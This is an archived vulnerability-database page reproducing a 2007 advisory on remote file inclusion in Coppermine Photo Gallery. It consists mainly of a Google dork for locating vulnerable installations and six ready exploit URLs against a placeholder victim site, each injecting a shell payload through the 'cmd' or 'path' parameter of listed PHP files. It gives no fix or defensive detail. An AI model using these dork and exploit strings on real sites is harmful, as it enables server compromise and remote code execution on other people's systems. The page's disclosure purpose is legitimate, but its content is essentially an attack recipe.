Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16296
HistoryMar 09, 2007 - 12:00 a.m.

Remote File Include In Script Coppermine Photo Gallery

2007-03-0900:00:00
vulners.com
31
JSON

By Hasadya Raed
Contact : [email protected]

Script : Coppermine Photo Gallery
Expl : Remote Include File
Dork : "Copyright (c) 2003-2006 Coppermine Dev Team"

B.Files :
image_processor.php
functions.php
picmgmt.inc.php
plugin_api.inc.php
index.php

Exploits :

http://www.Victim.Com/Script_Path/image_processor.php?cmd=[Shell-Attack]
http://www.Victim.Com/Script_Path/include/functions.php?path=[Shell-Attack]
http://www.Victim.Com/Script_Path/include/picmgmt.inc.php?cmd=[Shell-Attack]
http://www.Victim.Com/Script_Path/include/plugin_api.inc.php?path=[Shell-Attack]
http://www.Victim.Com/Script_Path/index.php?path=[Shell-Attack]
http://www.Victim.Com/Script_Path/pluginmgr.php?path=[Shell-Attack]

By Hasadya Raed

Get your free email from http://bsdmail.com

JSON